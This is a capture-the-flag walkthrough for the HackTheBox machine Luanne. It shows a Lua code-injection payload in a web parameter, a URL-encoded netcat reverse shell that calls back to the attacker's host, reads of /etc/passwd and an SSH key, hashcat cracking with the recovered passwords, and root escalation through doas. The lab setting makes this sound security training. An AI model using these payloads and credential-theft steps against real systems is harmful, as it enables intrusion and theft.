Luanne HackTheBox WalkThrough

Luanne hackthebox walkthrough

This is Luanne HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted to Luanne HTB machine. Before starting let us know something about this machine. It is a NetBSD box (which I came to know after I got into the box) with IP address 10.10.10.218 and difficulty easy assigned by its maker. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Luanne machine by pinging its IP 10.10.10.218. If all goes correct then start hacking.

As usual, I started by scanning the machine. Used Nmap [a port scanner] for this task and this time I have used an additional nmap switch -O for finding the Operating System as we are not aware of its OS prior. The result is below-

Scanning

$ sudo nmap -sC -sV -O -oN launne.nmap 10.10.10.218

Nmap scan report in Luanne hackthebox walkthrough

Nmap found port 22, 80 and 9001 as open. But it didn’t find the OS and even it didn’t guess its name. Anyway, we will find its name and version once we will be inside the box. For now let us enumerate on port 22, 80 and 9001. OpenSSH 8.0 is running on port 22 and its banner also revealed the Operating System name which is NetBSD. So here we came to know that OS of Luanne machine is NetBSD. SSH will be helpful once we get some credentials in further enumeration.

Let us dig deeper into different services of remaining ports. Nginx 1.19 web server is running on port 80 and Medusa 1.12 web server is running over port 9001. Since web servers are running over ports 80 and 9001 so we should have some websites running over URLs http://10.10.10.218 & http://10.10.10.218:9001. Ongoing to these URLs found login page on both of them like we have in tomcat web server. If you analyze nmap report deeply you will find that nmap script http-robots.txt revealed a folder weather at port 80 which can be accessed at URL http://10.10.10.218/weather/.

When I visited this URL it gave me 404 - Not Found error. Then I brute forced for files and folders using $dirsearch (a directory and file bruteforcer written in python) and wordlist directory-list-1.0.txt (this wordlist can be found at directory /usr/share/wordlists/dirbuster/ in Kali & Parrot)

Directory Bruteforcing

$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out

Directory brute-forcing in Luanne Htb machine

Directory bruteforcing revealed a file forecast. After accessing this file at URL http://10.10.10.218/weather/forecast got some message inside JSON format revealing a parameter city with its value list viz. city=list. When I accessed the URL got information about different cities.

Content of /weather/forecast/ URI in Luanne hackthebox walkthrough

After some enumeration and fuzzing got error revealing that this website is using Lua programming language. Check this URL for error http://10.10.10.218/weather/forecast?city=London‘.

Lua error exposing Lua programming language

Since it is using Lua language so I fuzzed the URL for some Lua strings and found that if we append ')os.execute("whoami") at the end of the URL http://10.10.10.218/weather/forecast?city=London it executes OS command on Luanne machine. I think this is the reason this machine is named Luanne because here we are able to execute code via Lua statement and Luanne also contains Lua word. Let us confirm OS command execution by checking /etc/passwd file of Luanne machine.

Confirming OS Command Execution

Open following URL in browser to confirm code execution on Luanne machine.

http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)–

Passwd file in Luanne hackthebox found during command execution

We have successfully confirmed remote code execution on Luanne machine. Let us get user shell on our local machine using one liner shellcode. I have used $nc one liner. You can found others at Pentestmonkey.

Getting User Shell

To get reverse shell first of all start netcat listener on your Kali machine and execute the following URL in the browser. You will get shell.

http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22rm%20%2ftmp%2ff%3Bmkfifo%20%2ftmp%2ff%3Bcat%20%2ftmp%2ff%7C%2fbin%2fsh%20-i%202%3E%261%7Cnc%2010.10.14.9%201234%20%3E%2ftmp%2ff%22)–

$ rlwrap nc -nvlp 1234

$ whoami && id

Getting user shell in Luanne Htb box during walkthrough

We have got user shell as user _httpd. The home folder of this user i.e., current folder contains a hidden file .htpasswd. After listing the contents of this file found a password hash of user webapi_user.

$ ls -la

$ cat .htpasswd

Content of hidden file htpasswd in home directory of _httpd

webapi_user : $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

Let us identify the type of this hash so that we can crack it using $hashcat (an offline password cracker).

$ hash-identifier

~$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

Identifying the Hash using hash-identifier during Luanne hackthebox walkthrough

hash-identifier identified this hash as MD5 (Unix). Let us crack it using wordlist rockyou.txt. rockyou.txt file can be found inside the directory /usr/share/wordlists/ of Kali and Parrot OS.

Cracking Hash 1 using Hashcat

$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt

Cracking hash 1 using hashcat

$ hashcat -m 500 -a 3 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show

Cracked hash 1 shown by hashcat

Hashcat has successfully cracked the hash and the cracked password is iamthebest. So we have the credential webapi_user:  iamthebest. When I tried to SSH using this credential it failed. After some enumeration found that port 3000 & 3001 are listening locally.

Listing the listening ports of Luanne machine during HackTheBox walkthrough

When tried to access service on port 3001 via the URL http://127.0.0.1:3001 got 401 unauthorized error. So used the credential webapi_user: iamthebest to access the service and found that we could easily logged in, and this time didn’t get any access denied permission.

$ curl http://127.0.0.1:3001

$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001

Getting content of webserver on port 3001 using Curl command

After some further enumeration got id_rsa key of user r.michaels inside its home folder using $curl command. This is somewhat different because normally id_rsa file is present inside the .ssh folder of user’s home directory and can be accessed by that user & root user only. But, here it can be accessed from a webserver running locally. So this file must be present inside some type of public_html folder. Don’t know exactly what is the folder name in which it is present until I pawned the box.

$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa

Id_rsa file of user r.michaels dumped locally during Luanne hackthebox machine writeup

We have got SSH private key. Let us SSH into Luanne machine using this key after changing its permission.

Getting User Shell using SSH

$ vi id_rsa

$ chmod 400 id_rsa

$ ssh -i id_rsa [email protected]

$ whoami && id

Logging to Luanne machine using r.michaels private Key

We are now logged in as user r.michaels. Let us capture user flag.

Capture User Flag

$ cat user.txt

User flag captured during Luanne walkthrough

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. For this I ran linpeas.sh (a post exploitation enumeration script) but linpeas didn’t find any valid PrivEsc vector. So I started to do manual enumeration on the box. After spending some times on the box found an encrypted file devel_backup-2020-09-16.tar.gz.enc inside the directory /home/r.michaels/backups/. Didn’t know how to extract this file. If it would be .gz or .g2z we would use $tar tool to extract but it is .enc extension file. After some googling found tool $netpgp that can decrypt this file. Check this for more info.

Finding PrivEsc Vector

$ ls -la /home/r.michaels/backups/

Backup directory result

To extract this file I simply copied this file into /tmp/ folder and extracted the file using the following command. When it asks for password enter the password iamthebest.

$ cd /tmp/

$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz

$ tar -xf devel_backup-2020-09-16.tar.gz

$ cat devel-2020-09-16/www/.htpasswd

Decrypting the content of file devel_backup-2020-09-16.tar.gz.enc using netpgp openBSD tool

After extracting this file found another hash of user webapi_user: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. . It is again md5 (Unix) hash you can see the result of hash-identifier.

$ hash-identifier

~$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

Identifying the Hash 2 type using hash-identifier

After cracking this hash using hashcat I found the password littlebear. Then I tried to change the user to root using $doas command of NetBSD and I could easily login as root. So here our PrivEsc vector is Privilege Escalation using Credential Dumping.

Cracking Hash 2 using Hashcat

$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt

Cracking hash 2 using hashcat

$ hashcat -m 500 -a 3 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show

Cracked hash 2 result shown by hashcat during Luanne hackthebox walkthrough

Let us change the user to root user using $doas command. $doas command in NetBSD is same as $sudo command in Linux OS. It executes command as other user. For more info check this link from FreeBSD.org.

$ doas -u root /bin/sh

~littlebear

# whoami && id

Switching to user root using doas command in Luanne Machine

Capture Root Flag

Let us capture root flag.

# cat /root/root.txt

Root flag captured during Luanne hackthebox walkthrough

This was how I rooted to Luanne HackTheBox machine. Learnt a lot after rooting this box. Hope you have also learnt some new things from this box walkthrough. Thanks for reading this writeup. For any query and suggestion feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.